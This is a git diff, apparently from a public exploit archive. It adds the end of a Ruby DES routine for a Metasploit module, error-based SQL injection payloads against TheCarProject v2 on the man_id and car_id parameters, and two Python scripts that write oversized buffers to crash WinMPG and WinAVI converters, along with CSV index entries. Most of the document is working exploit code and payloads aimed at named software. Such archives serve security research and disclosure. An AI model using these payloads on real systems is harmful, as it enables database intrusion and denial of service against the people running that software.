0 + v6 |= 0x8000000 + end + if (v4 & 0x10000) != 0 + v6 |= 0x10000000 + end + if (v3 & 0x10000) != 0 + v6 |= 0x20000000 + end + if (v4 & 0x1000000) != 0 + v6 |= 0x40000000 + end + if (v3 & 0x1000000) != 0 + v6 |= 0x80000000 + end + + # Create return tuple + ret_block = Array.new + ret_block.push v5 + ret_block.push v6 + ret_block + end + + def load(a1) + a2 = Array.new(8, 0) + v3 = a1 + a2[0] = a1 & 0xff + v3 >>= 3 + a2[1] = v3 & 0xff + v3 >>= 4 + a2[2] = v3 & 0xff + v3 >>= 4 + a2[3] = v3 & 0xff + v3 >>= 4 + a2[4] = v3 & 0xff + v3 >>= 4 + a2[5] = v3 & 0xff + v3 >>= 4 + a2[6] = v3 & 0xff + v3 >>= 4 + a2[7] = v3 & 0xff + a2[0] = (a2[0] * 2) & 0xff + a2[7] |= (16 * a2[0]) & 0xff + v3 >>= 4 + a2[0] |= v3 & 0xff + + data_block = a2.pack("c*").unpack("V*") + data_block[0] &= 0x3F3F3F3F + data_block[1] &= 0x3F3F3F3F + data_block + end + + def desx(data_block, ksch, idx) + ksch = ksch.pack("V*") + ksch = ksch.unpack("Q<*") + key_block = ksch[idx] + + data_block_ptr = data_block.pack("V*") + data_block_ptr = data_block_ptr.unpack1("Q<*") + data_block_ptr ^= key_block + + counter = 1 + data_block_byte_ptr = [data_block_ptr].pack('Q<') + left = SBOXES[data_block_byte_ptr[0].ord] + right = SBOXES[data_block_byte_ptr[0].ord + (counter << 6)] + counter += 1 + left ^= SBOXES[data_block_byte_ptr[1].ord + (counter << 6)] + counter += 1 + right ^= SBOXES[data_block_byte_ptr[1].ord + (counter << 6)] + counter += 1 + left ^= SBOXES[data_block_byte_ptr[2].ord + (counter << 6)] + counter += 1 + right ^= SBOXES[data_block_byte_ptr[2].ord + (counter << 6)] + counter += 1 + left ^= SBOXES[data_block_byte_ptr[3].ord + (counter << 6)] + counter += 1 + right ^= SBOXES[data_block_byte_ptr[3].ord + (counter << 6)] + counter += 1 + left ^= SBOXES[data_block_byte_ptr[4].ord + (counter << 6)] + counter += 1 + right ^= SBOXES[data_block_byte_ptr[4].ord + (counter << 6)] + counter += 1 + left ^= SBOXES[data_block_byte_ptr[5].ord + (counter << 6)] + counter += 1 + right ^= SBOXES[data_block_byte_ptr[5].ord + (counter << 6)] + counter += 1 + left ^= SBOXES[data_block_byte_ptr[6].ord + (counter << 6)] + counter += 1 + right ^= SBOXES[data_block_byte_ptr[6].ord + (counter << 6)] + counter += 1 + left ^= SBOXES[data_block_byte_ptr[7].ord + (counter << 6)] + counter += 1 + right ^= SBOXES[data_block_byte_ptr[7].ord + (counter << 6)] + + # Create return tuple + ret_block = Array.new + ret_block.push left + ret_block.push right + ret_block + + end + + def store(data_block) + a1 = data_block.pack("V*") + val = 8 * (16 * (16 * (16 * (16 * (16 * (16 * a1[7].ord | a1[6].ord) | a1[5].ord) | a1[4].ord) | a1[3].ord) | a1[2].ord) | a1[1].ord) | a1[0].ord >> 1 + val & 0xffffffff + end + + def sbox_xors(data_block_in, ksch_arg, decrypt_flag) + + decrypt_flag_cpy = decrypt_flag + if (decrypt_flag & 0x100) != 0 + data_block_0 = data_block_in + else + data_block_0 = rotate_block_init(data_block_in) + end + + encrypt_flag = (decrypt_flag_cpy & 1) == 0 + ti_block_0 = load(data_block_0[0]) + ti_block_1 = load(data_block_0[1]) + + for i in 0..15 + ti_cpy = ti_block_1 + if encrypt_flag + ti_block_1 = desx(ti_block_1, ksch_arg, i) + else + ti_block_1 = desx(ti_block_1, ksch_arg, 15 - i) + end + ti_block_1[0] ^= ti_block_0[0] + ti_block_1[1] ^= ti_block_0[1] + ti_block_0 = ti_cpy + end + + data_block_0[0] = store(ti_block_1) + data_block_0[1] = store(ti_block_0) + + if (!(decrypt_flag_cpy & 0x200) != 0) + rotate_block_final(data_block_0) + else + data_block_0 + end + + end + + def gen_key_unchecked(key) + + idx = 0 + key_arr = key.unpack("V*") + key_sch = Array.new + for i in 0..15 + idx += ROTATIONS[i].ord + v6 = 0 + v5 = 0 + v14 = 0 + for j in 0..47 + pc2_p1 = (idx + PC2[j].ord) % 0x1C + if PC2[j].ord > 0x1B + pc2_p2 = 0x1c + else + pc2_p2 = 0 + end + v13 = PC1[pc2_p1 + pc2_p2].ord + if v13 <= 31 + v12 = 0 + else + v12 = 1 + v13 -= 32 + end + if j <= 23 + v10 = j + else + v14 = 1 + v10 = j - 24 + end + v11 = 8 * (v10 / 6) + v10 % 6 + key_and = key_arr[v12] & SBOX_BYTE_ORDER[v13] + + if (key_and != 0) + if v14 == 1 + v6 |= SBOX_BYTE_ORDER[v11] + else + v5 |= SBOX_BYTE_ORDER[v11] + end + end + end + key_sch.push v5 + key_sch.push v6 + end + key_sch + end + + def des_string_to_key(key_buf_str) + + des_keysch_0 = gen_key_unchecked(INIT_DES_KEY_0) + des_keysch_1 = gen_key_unchecked(INIT_DES_KEY_1) + + temp_key1 = Array.new(8, 0) + temp_key2 = Array.new(8, 0) + + key_buf_bytes = key_buf_str.unpack("c*") + + counter = 0 + key_buf_str_len = key_buf_bytes.length - 1 + for i in 0..key_buf_str_len + counter %= 8 + temp_key1[counter] |= key_buf_bytes[i] + temp_key2[counter] |= key_buf_bytes[i] + + data_block = temp_key1.pack("c*").unpack("V*") + temp_key1 = sbox_xors(data_block, des_keysch_0, 0) + temp_key1 = temp_key1.pack("V*").unpack("c*") + + data_block = temp_key2.pack("c*").unpack("V*") + temp_key2 = sbox_xors(data_block, des_keysch_1, 0) + temp_key2 = temp_key2.pack("V*").unpack("c*") + counter += 1 + end + + # Prepare the return array + ret_key = Array.new(8, 0) + for j in 0..7 + ret_key[j] = temp_key2[j] ^ temp_key1[j] + end + ret_key.pack("c*") + end + + def des_cbc(input_buf, key_sch, iv, decrypt_flag) + + output_block_arr = Array.new + blocks = input_buf.unpack("Q<*") + for i in 0..blocks.length - 1 + + current_block = blocks[i] + if decrypt_flag == 1 + cur_block = current_block + else + current_block ^= iv + end + + current_block_tuple = [current_block].pack("Q<").unpack("V*") + output_block_tuple = sbox_xors(current_block_tuple, key_sch, decrypt_flag) + output_block = output_block_tuple.pack("V*").unpack1("Q<") + output_block_arr.push output_block + + if decrypt_flag == 1 + output_block ^= iv + iv = cur_block + else + iv = output_block + end + end + + output_block_arr.pack("Q<*") + + end + + def des_crypt_func(binary_buf, key_buf, decrypt_flag) + des_key = des_string_to_key(key_buf) + des_keysch = gen_key_unchecked(des_key) + + temp_enc_buf = Array.new(8 * ((binary_buf.length + 7) >> 3) + 8, 0) + binary_buf_str = binary_buf.unpack('c*') + + for j in 0..binary_buf_str.length - 1 + temp_enc_buf[j] = binary_buf_str[j] + end + + temp_enc_buf = temp_enc_buf.pack('c*') + output_buf = des_cbc(temp_enc_buf, des_keysch, 0, decrypt_flag) + output_buf + end + +end \ No newline at end of file diff --git a/exploits/php/webapps/46555.txt b/exploits/php/webapps/46555.txt new file mode 100644 index 000000000..e658b1c2b --- /dev/null +++ b/exploits/php/webapps/46555.txt @@ -0,0 +1,83 @@ +=========================================================================================== +# Exploit Title: TheCarProject v2 - 'man_id' SQL Inj. +# Dork: N/A +# Date: 17-03-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: https://thecarproject.org/ +# Software Link: https://sourceforge.net/projects/thecarproject/ +# Version: v2 +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: A fully Featured Auto vehicle, Auto Dealer php +sales web site software + built on Bootstrap 3 it will present the best possible viewpoint for +your customers + unlimited items, unlimited images per item. Totally driven from the +admin side of the site. +=========================================================================================== +# POC - SQLi +# Parameters : man_id +# Attack Pattern : +-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a) +# GET Method : http://localhost/TheCarProject/cp/includes/loaditem.php?man_id=-1 +or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT +COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x +FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) +=========================================================================================== +########################################################################################### +=========================================================================================== +# Exploit Title: TheCarProject v2 - 'car_id' SQL Inj. +# Dork: N/A +# Date: 17-03-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: https://thecarproject.org/ +# Software Link: https://sourceforge.net/projects/thecarproject/ +# Version: v2 +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: A fully Featured Auto vehicle, Auto Dealer php +sales web site software + built on Bootstrap 3 it will present the best possible viewpoint for +your customers + unlimited items, unlimited images per item. Totally driven from the +admin side of the site. +=========================================================================================== +# POC - SQLi +# Parameters : car_id +# Attack Pattern : +-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a) +# GET Method : http://localhost/TheCarProject/cp/info.php?man_id=3&car_id=-1 +or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT +COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x +FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) +=========================================================================================== +########################################################################################### +=========================================================================================== +# Exploit Title: TheCarProject v2 - 'man_id' SQL Inj. +# Dork: N/A +# Date: 17-03-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: https://thecarproject.org/ +# Software Link: https://sourceforge.net/projects/thecarproject/ +# Version: v2 +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: A fully Featured Auto vehicle, Auto Dealer php +sales web site software + built on Bootstrap 3 it will present the best possible viewpoint for +your customers + unlimited items, unlimited images per item. Totally driven from the +admin side of the site. +=========================================================================================== +# POC - SQLi +# Parameters : man_id +# Attack Pattern : +-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a) +# GET Method : http://localhost/TheCarProject/cp/item_listing.php?man_id=-1 +or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT +COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x +FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) +=========================================================================================== \ No newline at end of file diff --git a/exploits/windows/dos/46553.py b/exploits/windows/dos/46553.py new file mode 100755 index 000000000..bb7507691 --- /dev/null +++ b/exploits/windows/dos/46553.py @@ -0,0 +1,29 @@ +# Exploit Title: WinMPG Video Convert Local Dos Exploit +# Date: 15.03.2019 +# Vendor Homepage:http://www.winmpg.com +# Software Link: http://www.winmpg.com/down/WinMPG_VideoConvert.zip +# Exploit Author: Achilles +# Tested Version: 9.3.5 and older ones +# Tested on: Windows XP SP3 EN + + +# 1.- Run python code :WinMPG.py +# 2.- Open EVIL.txt and copy content to clipboard +# 3.- Open WinMPG.exe and Click 'ALL-AVI' +# 4.- In the new Window click Register +# 5.- Paste the content of EVIL.txt into the Field: 'Name and Registration Code' +# 6.- Click 'Register'and you will see a crash. + + + +#!/usr/bin/env python +buffer = "\x41" * 6000 + +try: + f=open("Evil.txt","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/46554.py b/exploits/windows/dos/46554.py new file mode 100755 index 000000000..6e885dd91 --- /dev/null +++ b/exploits/windows/dos/46554.py @@ -0,0 +1,28 @@ +# Exploit Title: WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 Local Dos Exploit +# Date: 16.03.2019 +# Vendor Homepage:http://www.winavi.com +# Software Link: http://www.winavi.com/user/download/WinAVI_iPod_3GP_MP4_PSP_Converter.exe +# Exploit Author: Achilles +# Tested Version: 4.4.2 +# Tested on: Windows XP SP3 EN +# Windows 7 x64 Sp1 + + +# 1.- Run the python script, it will create a new file with the name "Evil.avi" +# 2.- Open WinAVI.exe and Click 'Convert to iPhone' +# 3.- Load the file "Evil.avi" +# 4.- And you will see a crash. + + + +#!/usr/bin/env python +buffer = "\x41" * 6000 + +try: + f=open("Evil.avi","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 83a2558e1..11f3faf0a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6356,6 +6356,8 @@ id,file,description,date,author,type,platform,port 46533,exploits/windows/dos/46533.txt,"Microsoft Windows - '.reg' File / Dialog Box Message Spoofing",2019-03-13,hyp3rlinx,dos,windows, 46534,exploits/windows/dos/46534.txt,"Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal",2019-03-13,"Kevin Randall",dos,windows,21 46535,exploits/windows/dos/46535.txt,"Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal",2019-03-13,"Kevin Randall",dos,windows,21 +46553,exploits/windows/dos/46553.py,"WinMPG Video Convert 9.3.5 - Denial of Service",2019-03-18,Achilles,dos,windows, +46554,exploits/windows/dos/46554.py,"WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 - Denial of Service",2019-03-18,Achilles,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -17255,6 +17257,7 @@ id,file,description,date,author,type,platform,port 46543,exploits/windows/remote/46543.py,"FTPGetter Standard 5.97.0.177 - Remote Code Execution",2019-03-14,w4fz5uck5,remote,windows, 46544,exploits/multiple/remote/46544.py,"Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution",2019-03-14,sud0woodo,remote,multiple, 46547,exploits/windows/remote/46547.py,"Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow",2019-03-15,"Joseph McDonagh",remote,windows,25 +46556,exploits/multiple/remote/46556.rb,"BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit)",2019-03-18,Metasploit,remote,multiple,3181 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -40995,3 +40998,4 @@ id,file,description,date,author,type,platform,port 46549,exploits/php/webapps/46549.txt,"Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities",2019-03-15,"Gionathan Reale",webapps,php,80 46550,exploits/php/webapps/46550.txt,"Laundry CMS - Multiple Vulnerabilities",2019-03-15,"Mehmet EMIROGLU",webapps,php,80 46551,exploits/php/webapps/46551.php,"Moodle 3.4.1 - Remote Code Execution",2019-03-15,"Darryn Ten",webapps,php,80 +46555,exploits/php/webapps/46555.txt,"TheCarProject v2 - Multiple SQL Injection",2019-03-18,"Mehmet EMIROGLU",webapps,php,80